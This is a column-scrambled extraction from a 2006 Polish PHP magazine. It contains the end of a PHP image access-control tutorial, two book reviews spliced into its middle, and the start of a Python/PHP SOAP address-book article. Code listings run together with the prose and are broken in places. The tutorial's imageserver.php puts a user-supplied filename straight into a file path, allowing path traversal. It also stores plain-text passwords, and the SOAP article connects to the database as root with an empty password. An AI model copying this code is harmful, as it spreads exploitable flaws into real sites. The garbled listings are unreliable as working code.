foreach ($lines as $line) { print $line; }
}else { // Jeśli dane są błędne: ponowne wyświetlenie ekranu logowania
print (ShowLoginPage('error')); } Kolejne zwiększenie
exit; ochrony
?> Nieraz zdarza się, że właściciel plików gra-
ficznych chce je udostępnić wybranym
Listing 4. Skrypt wylogowania (plik logoff.php)
użytkownikom, ale zarazem uniemożliwić
<?php lokalne zapisywanie obrazów poprzez kli-
/* Pat OBrien, 01/02/2006 */ kanie ich prawym przyciskiem myszy i wy-
require_once "showloginpage.php"; bieranie Zapisz jako... z menu konteksto-
session_start();
wego. Najprostszym rozwiązaniem będzie
session_unset();
session_destroy();
umieszczenie w obrębie znacznika <head>
print (ShowLoginPage('logout')); stron HTML zawierających obrazy funkcji
?> JavaScriptu o nazwie rightmouse(), któ-
ra będzie obsługiwać przechwycone zda-

58 www.phpsolmag.org PHP Solutions Nr 3/2006

 Recenzje

PHP5. Księga eksperta «««««

Autor: John Coggeshall
Wydawnictwo: Helion 2005 Cena: 89,00 zł

Książka PHP5. Księga eksperta tak naprawdę nie jest KSIĘGĄ EKSPERTA. Najchętniej określiłbym ją mianem “Vademe-
cum dewelopera PHP”, choć i to byłoby trochę przesadzone. Najlepiej chyba pasuje tu określenie: Luźny przewodnik po róż-
nych możliwościach PHP5.
W książce znajdziemy informacje zupełnie podstawowe, jak również te, które wprowadzają już w świat “Profesjonalne-
go programowania w PHP”. Dowiemy się nieco o szablonach Smarty, PEAR, XSLT czy debugowaniu i optymalizacji skryp-
tów PHP.
Bardziej zaawansowani Czytelnicy mogą poczytać o szyfrowaniu danych, programowaniu obiektowym, obsłu-
dze błędów czy tworzeniu witryn dla WAP. Znajdziemy też dodatki o migracji aplikacji z PHP4 do PHP5, czy cieka-
wy fragment o dobrych technikach programowania i zagadnieniach wydajności.
W książce zdecydowanie brakuje praktycznych przykładów zaawansowanego tworzenia aplikacji w PHP5.
Próżno szukać informacji o modelowaniu w UML, wykorzystaniu wzorców projektowych czy testowaniu aplikacji.
Przydałoby się studium przypadku, w którym autor pokazałby, jak podejść do większego projektu informatycznego,
jak go planować i nim zarządzać. W końcu każdy “Ekspert” musi mieć pojęcie o profesjonalnym tworzeniu więk-
szych aplikacji.
Książka jest solidną i przydatną pozycją, nie do końca chyba jednak przydatną ekspertom od PHP.
Dariusz Pawłowski

ActionScript. Receptury «««««

Autor: Joey Lott
Wydawnictwo: Helion Cena: 99,90 zł

Kiedy zabierałem się do lektury „O’Reilly - ActionScript Receptury”, nie mogłem doczekać się otwarcia książki i zato-
pienia w recepturach i kolejnych sposobach na wyciśnięcie z flash’a maksymalnej funkcjonalności. Chcąc dowiedzieć
się co czeka na mnie w tej pozycji, sięgnąłem do spisu treści, gdzie spotkało mnie lekkie rozczarowanie. Znając serię
do jakiej książka należy, spodziewałem się, że już w pierwszym punkcie ujrzę recepturę która z miejsca powali mnie na
kolana. Niestety tak się nie stało.
Książka napisana została jako pozycja, którą czytać należy w jedyny słuszny sposób: od pierwszego rozdziału,
traktującego o sprawach w niektórych przypadkach wręcz banalnych, do ostatniego, zawierającego już naprawdę roz-
budowane receptury. Każdą z receptur zorganizowano w standardowej formie, z jaką często pracują programiści. Au-
torzy stawiają problem do rozwiązania, a następnie przedstawiają jego analizę i rozwiązanie. Pozwala to w pełni zrozu-
mieć poszczególne receptury - bez konieczności zaglądania na inne strony w poszukiwaniu powiązanych zagadnień,
które pomogłyby w zrozumieniu danego problemu (choć odniesienia do zagadnień poruszanych w innych działach zda-
rzają się w listingach).
Na koniec zostawiłem coś, co uważam za poważną wadę dla każdego, kto będzie chciał w praktyce wykorzystać
choćby fragmenty przykładów zaprezentowanych w książce. Zapoznałem się ze wszystkimi recepturami i zauważyłem,
że w niektórych przypadkach listingi dołączone do rozdziałów przekraczały aż cztery strony! W przypadku pro-
stych receptur rozwiązujących pojedyncze problemy przepisanie całego kodu nie powinno sprawić czytelniko-
wi większego problemu. Kiedy jednak mamy do czynienia z kodem aplikacji będącej „Centrum Teleczatu i Wia-
domości Wideo” o dosyć dużej złożoności, umieszczenie kodu na płycie, bądź innym nośniku jest rozwiąza-
niem wręcz wymaganym, a na pewno o wiele bardziej trafnym niż druk.
Niemniej jednak muszę przyznać, że wszystkie receptury zawarte w recenzowanej książce Joey’a Lott’a są na-
prawdę solidnie przygotowane i faktycznie rozwiązują wiele problemów, na jakie developer flash’a może natknąć
się podczas codziennej pracy. Jednak osoby, które zajmują się tworzeniem aplikacji we flash’u profesjonalnie, mo-
gą poczuć niedosyt po lekturze tej pozycji.
Ogólnie mogę polecić tę książkę zarówno początkującym jak i zaawansowanym (ale nie profesjonalnym) użyt-
kownikom pakietu Macromedii, a niedługo już Adobe.
Bartłomiej Wereszczyński
Projekty ImageVault

rzenia MOUSEDOWN i MOUSEUP. Funkcja bę-

Listing 5. Skrypt udostępniający pliki graficzne (plik imageserver.php) dzie sprawdzać, który przycisk myszy zo-
stał naciśnięty, a w przypadku stwierdzenia
<?php
/* Pat OBrien, 10 stycznia 2006 */ naciśnięcia przycisku 2 lub 3 wyświetli po-
// Ustala rozszerzenie pliku wiadomienie informujące o wyłączeniu ob-
function get_extentsion($instr) { sługi prawego przycisku myszy.
$instr = trim($instr);
if (strlen($instr)<1) {return "gif";}
$type = strtolower(substr(strrchr($instr,"."),1));
Dodawanie obrazów
return $type; Wszystko gotowe – pozostaje już tylko
} dodać pliki graficzne, które będą wyświe-
// Zapisuje komunikat o błędzie do pliku tlane na stronie. Znacznik <img> każde-
function write_error_log($filename) { go obrazu będzie zawierał odwołanie do
// Otwarcie lub utworzenia pliku ../imagevault/errorlog.txt
skryptu imageserver.php, co będzie wy-
$efp = fopen('../imagevault/errorlog.txt', 'a');
// Utworzenie komunikatu o błędzie i zapisanie go do pliku glądało mniej więcej tak:
$errormessage = "Błąd: Nie można otworzyć pliku - ".$filename;
fwrite($efp, $errormessage); <img src="imageserver.php?filename=
fclose($efp); image1.gif" width="200"
return;
height="100">
}
/* -------------------- Część główna ----------------- */
session_start(); Teoretycznie wystarczy więc odpowiednio
$validuser = $_SESSION['validuser']; podmienić nazwę pliku i rozmiary obrazu.
if ($validuser == 10) { Nie jest to oczywiście zadanie trudne, ale
$filename = $_REQUEST["filename"];
przy galeriach liczących setki zdjęć ręcz-
// Pobranie z żądania nazwy pliku graficznego
$ext = get_extentsion($filename); ne wprowadzanie znaczników jest zaję-
// Pobranie rozszerzenia pliku ciem żmudnym i podatnym na błędy. Z te-
$fullpath = "../imagevault/".$filename; go też względu utworzymy skrypt pomoc-
// Dodanie pełnej ścieżki do pliku niczy, który odczyta nazwy plików z kata-
$fp = fopen($fullpath, 'rb');
logu imagevault i automatycznie wygene-
// Tryb binarny tylko do odczytu
if (!$fp) { // Zapisanie w logu komunikatu o nieudanej próbie otwarcia pliku ruje kod odpowiednich znaczników <img>,
write_error_log($filename); który użytkownicy będą mogli po prostu
print (" "); skopiować i wkleić na stronę. Kod skryp-
}else { // Odesłanie klientowi poprawnie odczytanego pliku tu zawiera plik linkgen.php (Listing 7),
// Ustawienie odpowiednich nagłówków
umieszczony w katalogu public_html.
$h1 = "Content-Type: image/".$ext;
header($h1);
header("Content-Length: ".filesize($fullpath)); Przygotowanie systemu
// Zrzut pliku i zakończenie skryptu. Funkcja fpassthru() sama zamknie Gdy mamy już wszystkie skrypty (in-
// plik po zakończeniu działania, więc nie trzeba wywoływać fclose() dex.php, main.php, imageserver.php, lo-
rewind($fp);
goff.php i linkgen.php), musimy je umie-
fpassthru($fp);
} ścić w katalogu public_html, a następ-
}else { print (" "); } nie utworzyć katalog imagevault na tym
// Użytkownik nieautoryzowany – odesłanie spacji samym poziomie, co public_html. Potem
exit; bierzemy dowolne dwa obrazy (na przy-
?>
kład image1.gif i image2.gif) i umiesz-
Listing 6. Kod JavaScriptu wyłączający obsługę prawego przycisku myszy czamy je w katalogu imagevault. Musimy
jeszcze dodać nowego użytkownika po-
<head><script language="JavaScript1.1"> przez utworzenie pliku users.txt w kata-
function rightmouse(e) {
if (navigator.appName == 'Netscape' && (e.which == 3 || e.which == 2))
return false;
else if (navigator.appName == 'Microsoft Internet Explorer' && (event.button
== 2 || event.button == 3)) { alert("Obsługa prawego przycisku myszy jest
wyłączona.");
return false; }
return true;
}
document.onmousedown=rightmouse; document.onmouseup=rightmouse;
if (document.layers) window.captureEvents(Event.MOUSEDOWN);
if (document.layers) window.captureEvents(Event.MOUSEUP);
window.onmousedown=rightmouse; window.onmouseup=rightmouse;
</script></HEAD>
Rysunek 1. Struktura plików systemu
ImageVault

60 www.phpsolmag.org PHP Solutions Nr 3/2006

 ImageVault Projekty

logu obrazów i zapisanie w nim wiersza o
treści testuser|pass.
Ostatni etap to utworzenie dwóch testo-
wych stron HTML. Pierwszą jest wspomnia-
na wcześniej strona index.html, czyli fak-
tyczna strona główna. W katalogu image-
vault tworzymy plik o następującej treści:
<html>
<body bgcolor="#FFFFFF">
<h1>Witamy na naszej stronie!</h1>
<a href="pictures.htm">
Kliknij tutaj, by zobaczyć zdjęcia</A>
</body>
</html>

Listing 7. Skrypt linkgen.php generujący kod HTML ze znacznikami <img> do- Ostatnim plikiem jest strona galerii pictu-
stępnych obrazów res.html (Listing 8), również zapisana w
katalogu public_html.
<?php
/* Pat OBrien, 1 lutego 2006
require_once "showloginpage.php";
*/
Próba generalna
function isimage($instr) { // Ustalenie rozszerzenia pliku Skoro wszystko jest już gotowe, po-
$isimage = false; ra wypróbować nasz system: otwie-
$instr = trim($instr); ramy przeglądarkę i wpisujemy adres
if (strlen($instr)<1) {return false;} strony pictures.html. Powinna się po-
$type = strtolower(substr(strrchr($instr,"."),1));
kazać strona zawierająca dwie iko-
if ( strcmp("gif", $type)==0 ) {$isimage = true;}
if ( strcmp("png", $type)==0 ) {$isimage = true;} ny nieistniejących obrazów, czyli do-
if ( strcmp("jpg", $type)==0 ) {$isimage = true;} kładnie to, o co nam chodziło – aby
if ( strcmp("jpeg", $type)==0 ) {$isimage = true;} zobaczyć obrazy, trzeba się zalogo-
if ( strcmp("bmp", $type)==0 ) {$isimage = true;} wać. Otwieramy więc stronę index.php
return $isimage; }
i wprowadzamy testowy login i hasło
/* --------------- Część główna ------------------------------ */
session_start(); (testuser i pass) w formularzu logowa-
$validuser = $_SESSION['validuser']; nia. W efekcie powinna zostać wyświe-
if ($validuser == 10) { tlona strona index.html. Kliknięcie jedy-
$content = "<html><body bgcolor='#FFFFFF'>\n". nego dostępnego odsyłacza przenie-
"<table width='800' border='0' cellspacing='0' cellpadding='5'>\n".
sie nas na stronę pictures.html: tym ra-
" <tr bgcolor='#006666'>\n<td><font face='Arial, Helvetica, sans-serif'
" size='2' color='#CCFFFF'>Nazwa pliku graficznego</font></td>\n". zem obrazy powinny być wyświetlane
" <td><font face='Arial, Helvetica, sans-serif' size='2' color='#CCFFFF'> poprawnie.
Kod HTML obrazu</font></td>\n</tr>\n";
// Pobranie listy nazw udostępnianych plików graficznych Podsumowanie
if ($handle = opendir('../imagevault/')) {
Jak widać, kontrolowanie dostępu do
while (false !== ($file = readdir($handle))) {
$file = basename(trim($file)); wybranych plików za pomocą skryp-
if (isimage($file)) { tu PHP na serwerze jest proste i szyb-
$fullpath = "../imagevault/".$file; kie. Nie trzeba korzystać z rozbudowa-
$size = getimagesize($fullpath); nych systemów kontroli dostępu tylko
if ($size) {
po to, by chronić wybrane pliki na wła-
// Utworzenie znacznika <img> dla bieżącego pliku
$imgtag = "<IMG SRC=\"imageserver.php?filename=".$file."\" snej stronie domowej czy na witrynie
WIDTH=\"".$size[0]."\"HEIGHT=\"".$size[1]."\">"; klubowej. Przedstawiony system może
// Utworzenie wpisu w tabeli dla bieżącego pliku posłużyć za podstawę dla bardziej za-
$content .= " <tr bgcolor='#EEEEEE'>\n". awansowanych rozwiązań, uwzględnia-
"<td><font face='Arial, Helvetica, sans-serif' size='2'>".$file.
jących na przykład automatyczną reje-
"</font></td>\n<td><font face='Arial, Helvetica, sans-serif'
"size='2'>\n<input type='text' name='imgtag' size='100' strację i usuwanie użytkowników, zróż-
maxlength='160' value='".$imgtag."'>\n</font></td></tr>\n"; nicowane poziomy dostępu i wszelkie
} } } inne operacje, jakie mogą być potrzeb-
$content .= "</table></body></html>\n"; ne. Tak czy inaczej, pamiętajmy za-
closedir($handle); }
wsze, że kluczem do sukcesu projektów
print $content; // Wypisanie plików z kodem odpowiednich znaczników <img>
}else { print(showLoginPage()); } // Użytkownik nieautoryzowany programistycznych jest ich jak najwięk-
exit; sza prostota. n
?>

Listing 8. Kod pliku pictures.html

<html>
<body bgcolor="#FFFFFF"> O autorze
<h1>Our Pictures</h1>
<img src="imageserver.php?filename=image1.gif" width="200" height=”100”> Patrick O’Brien jest założycielem i twór-
<br><br> cą serwisu Jpowered.com (http://www.
<img src="imageserver.php?filename=image2.gif" width="200" height=”100”> jpowered.com), dostarczającego zaawan-
</body> sowane rozwiązania dla twórców witryn in-
</html> ternetowych i programistów.

PHP Solutions Nr 3/2006 www.phpsolmag.org 61

 Projekty

Mariaż Pythona i PHP.

Tworzymy interfejs graficzny
z wykorzystaniem SOAP
Stopień trudności:



Krzysztof Sobolewski

Każdy język ma swoje mocne strony: PHP

słynie z oprogramowania serwerowego, Python
– z możliwości łatwego tworzenia
rozbudowanych aplikacji klienckich,
wyposażonych w graficzny interfejs
użytkownika (GUI). Łacząc możliwości obu
języków, dzięki protokołowi SOAP, w prosty
sposób otrzymamy potężną i funkcjonalną
aplikację typu klient-serwer.

W SIECI
1. http://www.python.org/
– oficjalna strona Pythona
2. http://phplens.com/
phpeverywhere/?q=node/
view/185
– Python kontra PHP
3. http://wiki.w4py.org/python-
vs-php.html
– Python kontra PHP
4. http://www.opensourcetutori
als.com/tutorials/Server-
Side-Coding/Python/
– tutoriale dla Pythona
W
yobraźmy sobie książkę tele-
adresową, w której będziemy
przechowywali dane o namia-
rach znajomych czy kontrahentów. Chcie-
libyśmy, aby informacje były gromadzone
w bazie danych na serwerze i udostępnia-
ne przez skrypt PHP-owy. Załóżmy że nie
chcemy jednak korzystać z interfejsu we-
bowego: znacznie bardziej wolimy wygo-
dę i funkcjonalność graficznych interfej-
sów okienkowych pod Windowsem czy Li-
nuksem. Z pomocą przychodzą nam usłu-
gi sieciowe (ang. Web Services), zwa-
ne też usługami sieciowymi, umożliwiają-
ce prostą do zorganizowania komunika-
cję pomiędzy klientem a serwerem. Pisa-
liśmy już o nich w paru artykułach (Google
API, XUL).
Jednym z najpopularniejszych protoko-
łów usług sieciowych jest SOAP. Przy jego
pomocy połączymy zainstalowaną na ser-
werze, korzystającą z bazy danych aplika-
cję PHP-ową z działającym na komputerze
klienta interfejsem użytkownika napisanym
w Pythonie z użyciem wxWidgets.
Podstawowe założenia
Nasz system będzie się składał z następu-
jących elementów:
• bazy danych – w niej będziemy skła-
dować dane książki teleadresowej,
• silnika (engine) – będzie się on znaj-
dował po stronie serwera i odpowiadał
wyłącznie za obsługę danych książki
Co należy wiedzieć...
Powinieneś znać model obiektowy i wy-
jątki w PHP5 oraz w Pythonie. Przydatna
będzie wiedza na temat wxWidgets, pro-
tokołu SOAP i formatu XML.
Co obiecujemy...
Po przeczytaniu artykułu będziesz wie-
dział jak zbudować aplikację klient-ser-
wer w oparciu o protokół SOAP, gdzie
po stronie serwera jest skrypt PHP, nato-
miast klient jest napisany w Pythonie.

62 www.phpsolmag.org PHP Solutions Nr 3/2006

62_63_64_65_66_67_68_69_70_71_Python_PL.indd 62 2006-04-05, 12:21:13


teleadresowej: ich zwracanie, doda-
wanie, usuwanie i modyfikację; będzie
też sprawdzał uprawnienia użytkowni-
ka do wykonania określonej operacji
na danych,
• interfejsu silnik-SOAP – jego miejsce
również jest po stronie serwera; bę-
dzie on organizował komunikację po-
między silnikiem, a aplikacją kliencką,
przetwarzał format danych pomiędzy
XML a tablicą, itd,
• interfejsu SOAP-GUI – będzie on czę-
ścią aplikacji klienckiej i, analogicznie
jak interfejs silnik-SOAP, będzie odpo-
wiadał za komunikację pomiędzy inter-
fejsem graficznym (GUI) a oprogramo-
waniem serwera.
• interfejsu graficznego (GUI) – za je-
go pomocą użytkownik będzie prze-
glądał dane oraz wydawał polecenia
(pobierz, skasuj, aktualizuj, dodaj do
bazy) interfejsowi SOAP-GUI, który
zajmie się ich dalszym przekazywa-
niem.
Wzajemne interakcje tych elementów
przedstawiamy na Rysunku 1. Typowa
sytuacja wygląda następująco: na żąda-
nie użytkownika, klient chce pobrać li-
stę wszystkich rekordów, więc przekazu-
je żądanie do interfejsu SOAP-GUI, który
z kolei zapisuje je w postaci XML i prze-
syła do aplikacji na serwerze. Tam żą-
danie jest odbierane przez interfejs sil-
nik-SOAP, konwertowane z XML-a na ta-
blicę i przekazywane silnikowi, który po-
biera dane z bazy. Następnie, odpowiedź
silnika trafia do interfejsu silnik-SOAP,
gdzie jest przekształcana na XML i wy-
syłane do aplikacji klienckiej, gdzie zno-
wu podlega zamianie na tablicę (a raczej
słownik, gdyż tak nazywa się tablica aso-
cjacyjna w Pythonie), która jest przeka-
zywana do interfejsu graficznego i ew.
wyświetlana.
Silnik oraz interfejs SOAP stworzy-
my pod PHP5, korzystając z PDO, kla-
sy SoapServer, poprawionego modelu
obiektowego i wyjątków. Natomiast apli-
kację kliencką napiszemy w Pythonie
(wersja 2.4), używając wxWidgets (in-
terfejs graficzny), wbudowanych funkcji
XML-owych oraz rozszerzenia SOAPpy.
Wybraliśmy wxWidgets, gdyż jest to na-
rzędzie rozbudowane, a zarazem prze-
nośne, działające zarówno pod Linuk-
sem, jak i Windowsem czy MacOS-em.
PHP Solutions Nr 3/2006
62_63_64_65_66_67_68_69_70_71_Python_PL.indd 63
Mariaż Pythona i PHP Projekty
Wymagania i instalacja
Potrzebujemy PHP 5.1, m.in. ze względu na PDO, które powinno być załączone w dystry-
bucji.
SOAP powinno również być dostępne w dystrybucji PHP, ale jeżeli kompilujemy parser,
musimy użyć opcji --enable-soap. Dodatkowo, będziemy potrzebowali GNOME XML Li-
brary (libxml) w wersji co najmniej 2.5.4. W bloku extension pliku php.ini musi znajdować
się odwołanie do soap.so lub php_soap.dll. Potrzebujemy też Pythona w wersji 2.4. Inter-
preter powinien być obecny w większości systemów Uni*owych, w tym dystrybucji Linuk-
sa. Wersja pod Windows jest wyposażona w prosty instaler.
Do zestawu pythonowego dodamy też wxWidgets (dawniej wxWindows), które możemy
pobrać spod adresu http://wxpython.org. W obecnej wersji, dystrybucja jest rozdzielona na
runtime (tego potrzebujemy) oraz dema i dokumentacje, które są przydatne, acz niewyma-
gane. W wersji pod Linuksa, wxPython wymaga dodatkowo bibliotek glib i gtk+.
Będziemy też potrzebowali biblioteki SOAPpy, zapewniającej obsługę SOAP pod Pytho-
nem. Ona z kolei wymaga pyxml oraz fpconst, które należy zainstalować w pierwszej ko-
lejności, później pobieramy i instalujemy bibliotekę SOAPpy. Instalacja rozszerzeń pytho-
nowych przeprowadzana jest za pomocą poleceń: python setup.py build oraz python
setup.py install
Po zainstalowaniu wszystkich elementów nasz zestaw jest gotowy do pracy.
Listing 1. Konstruktor silnika – to tu odbywa się inicjalizacja bazy danych
public function __construct(){
$this->msg='todoListEngine is ready';
try{
$this->db = new PDO('mysql:host=localhost;dbname=test', 'root', '');
// bardzo ważny atrybut – dzięki niemu PDO wyrzuca wyjątek zamiast
// FATAL ERROR
$this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
}catch (Exception $e){ return $this->errorArray("ERROR_NO_CONNECTION"); }
}
Listing 2. Metody narzędziowe, zwracające tablicę asocjacyjną zawierającą wy-
niki, komunikat lub informację o błędzie
private function resultArray($data){
return array('data_type'=>'entries','data_rows'=>$data);
}
private function msgArray($msg){
return array('data_type'=>'messages','data_rows'=>array(0=>array('msg'=>
$msg)));
}
private function errorArray($errorMsg){
return array('data_type'=>'errors','data_rows'=>array(0=>array('error'=>
$errorMsg)));
}
Listing 3. getDataFromSRC – główna metoda do pobierania danych z bazy
private function getDataFromSRC($userName,$pass,$query,$queryParams=array()
{
try{
$a=$this->checkConnection();
$a=$this->checkLogin($userName,$pass);
$stmt=$this->db->prepare($query);
foreach($queryParams as $i=>$j){ $stmt->bindValue(":".$i,$j); }
$stmt->execute();
$resultArray=$stmt->fetchAll(PDO::FETCH_ASSOC);
return $this->resultArray($resultArray);
}catch (Exception $e){ return $this->handleExceptions($e,
"ERROR_GET_FAILED");}
}
}
www.phpsolmag.org 63
2006-04-05, 12:21:21
 Projekty Mariaż Pythona i PHP
Tworzymy silnik
Przejdźmy teraz do tworzenia naszej apli-
kacji, zaczynając od silnika. Wykonanie
dowolnej operacji na danych będzie wy-
magało autoryzacji (którą będzie spraw-
dzał silnik) poprzez każdorazowe przesła-
nie hasła i loginu. Wszelkie błędy w dzia-
łaniu silnika zostaną obsłużone przez sys-
tem wyjątków (exceptions).
Nasz silnik będzie miał postać klasy
book_engine.
Zacznijmy od zdeklarowania pu-
blicznych i prywatnych zmiennych klasy:
$db (handler bazy danych), $required-
Fields (zestaw pól wymaganych pod-
czas dodawania danych do bazy),
$requiredFieldsUpdate (pola wymaga-
ne przy aktualizacji danych w bazie) oraz
$msg (komunikat zwracany przez silnik, wy-
korzystywany przez klienta w celu spraw-
dzenia, czy silnik działa). Teraz przejdzie-
my do metod, zaczynając od konstruktora
(Listing 1). To tutaj zainicjujemy bazę da-
nych, tworząc obiekt $this->db klasy PDO.
Operacja ta wymaga podania adresu ser-
wera, nazwy bazy, loginu i hasła (to ostat-
nie nie jest obowiązkowe, można zosta-
wić puste pole). Następnie ustawimy (se-
tAttribute) atrybut PDO::ATTR_ERRMODE tej
klasy: odpowiada on za sposób traktowa-
nia błędów w działaniu interfejsu PDO, ta-
kich jak np. brak połączenia z serwerem
bazodanowym czy błędna składnia kwe-
rendy. Chcemy, aby wszelkie problemy
tego rodzaju były obsługiwane poprzez
zgłaszanie wyjątku, więc ustawimy PDO::
ATTR_ERRMODE na PDO::ERRMODE_EXCEPTION.
Co więcej, całą operację inicjalizacji ba-
zy danych i ustawienia tego parametru uj-
miemy w bloku try...catch: w razie wy-
stąpienia błędu, funkcja zwróci komunikat
ERROR_NO_CONNECTION, który może później
zostać obsłużony przez klienta.
baza
danych
interfejs
silnik
SOAP SOAP
silnik
aplikacji
SERWER
Rysunek 1. Schemat działania systemu książki teleadresowej
64
62_63_64_65_66_67_68_69_70_71_Python_PL.indd 64
Podstawowe różnice pomiędzy Pythonem a PHP
• brak średników między poleceniami (np. na końcach wiersza),
• o składni decydują wcięcia – trzeba się ich trzymać co do kolumny w każdym bloku,
bo inaczej parser zwróci Syntax Error. Bloki otwieramy przez dwukropek i nie zamy-
kamy,
• kropka służy jako separator pomiędzy obiektem a metodą lub atrybutem, a nie do łą-
czenia łańcuchów (którego dokonujemy przy użyciu znaku +),
• tablice asocjacyjne – w Pythonie występują dwa najprostsze rodzaje tablic: lista in-
deksowana (list, której ogranicznikami są nawiasy kwadratowe []) oraz oparty na
kluczach słownik (dictionary, dict, którego ogranicznikami są nawiasy klamrowe {}).
Można łączyć oba typy, tzn. w listach zawierać słowniki i vice versa,
• w klasach nie ma podziału na metody publiczne i prywatne,
• nazwy zmiennych w Pythonie nie zaczynają się od znaku $,
• funkcje i metody deklarujemy przy użyciu instrukcji def, konstruktor klasy to _ _
init _ _ (),
• wewnątrz klasy na utworzony obiekt wskazuje zmienna self, nie $this.
Zwróćmy też uwagę na wywoła- kwerendę ($query) oraz opcjonalnie para-
nie funkcji errorArray: jest to prywatna metry kwerendy ($queryParams).
metoda klasy book_engine, której zada- Następnie w bloku try..catch spraw-
niem jest zwracanie błędów w postaci dzamy, czy zostało nawiązane połączenie
tablicy przygotowanej do późniejszego oraz, czy użytkownik został poprawnie zalo-
przekształcenia na XML. Na Listingu 2 gowany. Dokonamy tego za pomocą dwóch
widzimy tę funkcję obok resultArray metod narzędziowych: checkConnection()
i msgArray, odpowiadających za zwra- oraz checkLogin() (Listing 4), które w ra-
canie wyników operacji bazodanowych zie niepowodzenia wyrzucą wyjątek. Ob-
oraz komunikatów innych, niż infor- sługą wyjątków zajmie się prywatna meto-
macje o błędach. W każdym przypad- da klasy book_engine, handleExceptions().
ku, tablica wygląda tak samo: różni się Takie użycie wyjątków jest sensowne i nie
jedynie elementem określającym typ jest przesadą, gdyż każda niemożność wy-
zwracanych danych (entries – wyniki, konania operacji przez aplikację serwerową
errors – błędy i messages – komunika- dla klienta jest po prostu błędem, niezależ-
ty), na podstawie którego klient będzie nie od źródła tego błędu. Wyjątki zapewnia-
później oceniał, jakiego typu informacja ją możliwość kontrolowania wszelkich sytu-
do niego dotarła. acji tego rodzaju w dwóch czytelnych blo-
kach, bez zaciemniania kodu dziesiątkami
Pobieranie danych z bazy dodatkowych konstrukcji typu if..else czy
Potrzebujemy teraz metody pozwalającej switch().
na pobieranie danych z bazy: określone- Jeżeli zarówno połączenie, jak i logo-
go rekordu (wg ID) lub wszystkich rekor- wanie odbyły się poprawnie, przechodzi-
dów. Nasza metoda będzie się nazywa- my do wysyłania kwerendy. Skorzystamy
ła getDataFromSRC() i będzie przyjmowała w tym celu ze świetnej możliwości ofero-
następujące parametry (Listing 3): nazwę wanej także przez PDO, nazywanej pre-
użytkownika ($userName), hasło ($pass), pared statements (pisaliśmy o niej sze-
rzej w „PDO – przyszły standard dostępu
do baz danych” PHP Solutions 5/2005).
Prepared statements ułatwiają tworzenie
kwerendy, zastępując tradycyjne, polega-
jące na łączeniu łańcuchów metody wpi-
sywania parametrów poprzez tworzenie
interfejs pewnego rodzaju szablonów zapytania,
SOAP- GUI
GUI
gdzie za pomocą specjalnych odnośni-
ków (rozpoczynających się przeważnie od
dwukropka) przekazujemy do zapytania
zmienne lub ich wartości. Zalety prepared
statements nie kończą się jednak na uła-
twianiu programowania: ich użycie powo-
KLIENT duje również automatyczne i odpowiednie
dla danego typu bazy danych eskejpowa-
nie znaków (ang. character escaping), co
www.phpsolmag.org PHP Solutions Nr 3/2006
2006-04-05, 12:21:23

chroni nas przed atakami SQL Injection
oraz zniesienie konieczności wpisywa-
nia cudzysłowów lub apostrofów w samej
kwerendzie, co umożliwia bezproblemo-
we przekazywanie danych zawierających
te znaki w dowolnym układzie.
Aby utworzyć nowy prepared sta-
tement o nazwie $stmt, użyjemy meto-
dy prepare() naszego obiektu $this->db.
Określimy w niej podstawową formę kwe-
rendy (szablon). Następnie, w pętli foreach
odczytamy kolejne parametry, jeżeli zosta-
ły one zdefiniowane w ostatnim, opcjonal-
nym argumencie getDataFromSRC(). Ar-
gument ten jest tablicą asocjacyjną, za-
wierającą klucze (na ich podstawie stwo-
rzymy nazwy odnośników, o których mó-
wiliśmy) oraz wartości, które przypiszemy
do prepared statement używając metody
bindValue() obiektu $stmt.
Gotowy statement wykonamy używa-
jąc $stmt->execute(), a następnie przy
pomocy $stmt->fetchAll() odczytamy
wyniki (PDO::FETCH_ASSOC – w posta-
ci tablicy asocjacyjnej).
Jeżeli wszystko przebiegło poprawnie,
funkcja zwróci tablicę wyników (resultAr-
ray()), a jeżeli wystąpił błąd, zwrócony zo-
stanie komunikat błędu ERROR_GET_FAILED.
Zauważmy, że getDataFromSRC() jest
metodą prywatną. Jest to celowe i wynika
ze względów bezpieczeństwa: wszak prze-
kazujemy do niej kwerendę i nie chcemy,
aby można było to zrobić np. za pomocą
interfejsu silnik-SOAP. Kwerendy będziemy
przekazywać przy użyciu publicznych me-
tod getAllEntries() oraz getOneEntry()
(Listing 5), które będą zwracały wszystkie
pozycje z tabeli bazodanowej lub jedną wy-
braną. Pierwsza z tych metod wymaga po-
dania jedynie loginu i hasła, podczas gdy
druga potrzebuje także ID wybranego re-
kordu.
Dodawanie nowych rekordów
Stworzymy teraz metodę addDataToSRC(),
(Listing 6), która będzie odpowiadała za
dodawanie nowych rekordów do bazy.
Przyjmuje ona 3 parametry: login, hasło
i dane do wstawienia, a swoje działanie
rozpoczyna od sprawdzania poprawności
połączenia i zalogowania.
Przejdźmy teraz do przetwarza-
nia przekazanych danych: metoda
addDataToSRC() pozwala na dodanie jed-
nego lub więcej rekordów za jednym wy-
wołaniem; w obu przypadkach przekazuje-
my tablicę pozycji do wstawienia, która na-
stępnie będzie iterowana w pętli foreach.
PHP Solutions Nr 3/2006
62_63_64_65_66_67_68_69_70_71_Python_PL.indd 65
Mariaż Pythona i PHP Projekty
Każdy wiersz tablicy musi zawierać klucze ment z poleceniem INSERT i parametrami
o nazwach odpowiadających polom tabeli odpowiadającymi nazwom pól z $this-
bazodanowej book – będzie to sprawdza- >requiredFields, po czym zostanie wy-
ne przy użyciu prywatnej metody narzę- konana kwerenda. W przypadku udanego
dziowej checkRequiredFields(), wyrzuca- dodania rekordu metoda zwróci komunikat
jącej w razie błędu wyjątek z komunikatem OK_ADDED_DATA, lub ERROR_ADD_FAILED w
ERROR_BAD_DATA. Warto pamiętać, iż meto- razie niepowodzenia. W tym drugim przy-
da ta sprawdza jedynie pola zdeklarowane padku otrzymamy również bardziej szcze-
w tablicy $this->requiredFields, wśród gółowy komunikat (np. ERROR_BAD_DATA),
których nie znajduje się ID – nie ma więc następujący po ERROR_ADD_FAILED i oddzie-
znaczenia, czy zestaw danych przekazy- lony od niego znakiem =. Metoda jest go-
wanych do addDataToSRC() zawiera tako- towa.
wy atrybut, czy nie. Następnie, dla każde- Analogicznie do getDataFromSRC(),
go wersu tworzony będzie prepared state- addDataToSRC() jest metodą prywatną
Listing 4. Metody narzędziowe, sprawdzające połączenie (checkConnection())
i zalogowanie (checkLogin) oraz metoda obsługująca wyjątki (handleExceptions())
private function checkConnection(){
if(!isset($this->db)) { throw new Exception ('ERROR_NO_CONNECTION'); }
}
private function checkLogin($userName,$pass){
...
